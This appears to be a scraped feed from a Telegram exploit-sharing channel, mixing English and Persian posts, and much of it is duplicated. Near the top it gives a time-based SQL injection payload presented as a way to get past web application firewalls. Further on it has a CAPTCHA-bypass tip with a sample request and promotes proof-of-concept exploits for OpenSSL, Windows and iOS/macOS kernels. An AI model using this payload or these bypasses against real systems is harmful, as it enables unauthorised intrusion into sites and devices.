0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
We have added some adjustments to the payload that may bypass some WAFs & to help you with the hunt!#BugBountyTips
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
cve-2022-3602
cve-2022-3786 / openssl-poc
Github
#Openssl #poc
——————
0Day.Today
@LearnExploit
@Tech_Army
cve-2022-3786 / openssl-poc
Github
#Openssl #poc
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2022-33679 ( Harmful RC4 and 1day exploit )
Exploit
READ
#windows #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Exploit
READ
#windows #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
#Quotes
——————
0Day.Today
@LearnExploit
@Tech_Army
V: Tellme, do you know what day it is, Evey?
Evey: November the 4th?
V: Not Anymore
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡6❤1
بررسی CVE های پر سر و صدای این هفته (7 تا 13 آبان 1401)
https://vrgl.ir/oyat6
#CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
https://vrgl.ir/oyat6
#CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
👍6
🔶 آپدیت جدید تلگرام منتشر شد .
➕ موضوع در گروهها
در گروههایی که بیشتر از 200 عضو داشته باشند، میتوانید بحثها را به شکل موضوعهای جداگانه ساماندهی کنید. این قابلیت را در @TheForum امتحان کنید.
➕ نامهای کاربری کلکسیونی
در پلتفرم جدید، با استفاده از بلاکچین، نام کاربریهای اضافی را ذخیره کرده و از آنها در پروفایل، گروه یا کانال خود استفاده کنید.
➕ تبدیل صدا به متن در پیامهای ویدیویی
از این پس کاربران پرمیوم میتوانند پیامهای ویدیویی را به متن تبدیل کنند.
➕ واکنشها و ایموجیهای تعاملی بیشتر
از این پس زمانی که در گفتگویهای تک به تک روی ایموجیهای 😴👨💻🤓👀 بزنید، انیمیشنهای تمامصفحه را نمایش داده میشوند. چنانچه تلگرام طرف مقابل باز باشد، انیمیشن بطور همزمان برای او هم نمایش دادهخواهدشد.
همچنین 😴👨💻🤓👀 و 👻🎃😭 هم به عنوان واکنش برای همه کاربران دردسترس خواهند بود.
➕ بستههای اموجی جدید
کاربران پرمیوم به 12 بسته اموجی جدید که توسط هنرمندان تلگرام طراحی شدهاند، دسترسی خواهند داشت.
Read more
#Telegram
——————
0Day.Today
@LearnExploit
@Tech_Army
➕ موضوع در گروهها
در گروههایی که بیشتر از 200 عضو داشته باشند، میتوانید بحثها را به شکل موضوعهای جداگانه ساماندهی کنید. این قابلیت را در @TheForum امتحان کنید.
➕ نامهای کاربری کلکسیونی
در پلتفرم جدید، با استفاده از بلاکچین، نام کاربریهای اضافی را ذخیره کرده و از آنها در پروفایل، گروه یا کانال خود استفاده کنید.
➕ تبدیل صدا به متن در پیامهای ویدیویی
از این پس کاربران پرمیوم میتوانند پیامهای ویدیویی را به متن تبدیل کنند.
➕ واکنشها و ایموجیهای تعاملی بیشتر
از این پس زمانی که در گفتگویهای تک به تک روی ایموجیهای 😴👨💻🤓👀 بزنید، انیمیشنهای تمامصفحه را نمایش داده میشوند. چنانچه تلگرام طرف مقابل باز باشد، انیمیشن بطور همزمان برای او هم نمایش دادهخواهدشد.
همچنین 😴👨💻🤓👀 و 👻🎃😭 هم به عنوان واکنش برای همه کاربران دردسترس خواهند بود.
➕ بستههای اموجی جدید
کاربران پرمیوم به 12 بسته اموجی جدید که توسط هنرمندان تلگرام طراحی شدهاند، دسترسی خواهند داشت.
Read more
#Telegram
——————
0Day.Today
@LearnExploit
@Tech_Army
Telegram
موضوع در گروهها، نامهای کاربری کلکسیونی، تبدیل پیامهای ویدیویی به متن و موارد بیشتر
در بهروزرسانی امروز، قابلیت افزودن موضوع برای مدیریت بهتر بحثها در گروههای بزرگ، نوع جدیدی از نام کاربریهای امن بر بستر بلاکچین، گزینهای برای تبدیل پیامهای ویدیویی به متن و… به تلگرام اضافه خواهند شد.
👍3🤔1
پیرو صورتجلسه محرمانهی گروه اصلی طرح صیانت (از جمله وزیر فعلی دولت آقای دکتر رئیسی و وزیر دولت آقای دکتر احمدینژاد)
OFFSEC
——————
0Day.Today
@LearnExploit
@Tech_Army
OFFSEC
——————
0Day.Today
@LearnExploit
@Tech_Army
👍6
Bypass Captcha (Google reCAPTCHA)
1 . Try changing the request method, for example POST to GET
POST / HTTP 1.1
Host: http://target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
#bugbounty #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
1 . Try changing the request method, for example POST to GET
POST / HTTP 1.1
Host: http://target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
#bugbounty #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5
exploit for iOS 15_macOS 12.zip
5.5 MB
Kernel r/w Exploit for iOS 15 and macOS 12
CVE-2022-32845 : aned signature check bypass for model.hwx.
CVE-2022-32948 : DeCxt::FileIndexToWeight() OOB Read due to lack of array index validation.
CVE-2022-42805 : ZinComputeProgramUpdateMutables() potential arbitrary read due to Integer overflow issue.
CVE-2022-32899 : DeCxt::RasterizeScaleBiasData() Buffer underflow due to integer overflow issue.
Tested On :
iPhone12 Pro (iPhone13,3) with iOS 15.5.
iPad Pro (iPad8,10) with iPadOS 15.5.
iPhone11 Pro (iPhone12,3) with iOS 15.4.1.
MacBookAir10,1 M1 with macOS 12.4.
#IOS #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2022-32845 : aned signature check bypass for model.hwx.
CVE-2022-32948 : DeCxt::FileIndexToWeight() OOB Read due to lack of array index validation.
CVE-2022-42805 : ZinComputeProgramUpdateMutables() potential arbitrary read due to Integer overflow issue.
CVE-2022-32899 : DeCxt::RasterizeScaleBiasData() Buffer underflow due to integer overflow issue.
Tested On :
iPhone12 Pro (iPhone13,3) with iOS 15.5.
iPad Pro (iPad8,10) with iPadOS 15.5.
iPhone11 Pro (iPhone12,3) with iOS 15.4.1.
MacBookAir10,1 M1 with macOS 12.4.
#IOS #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
❤6👍1👎1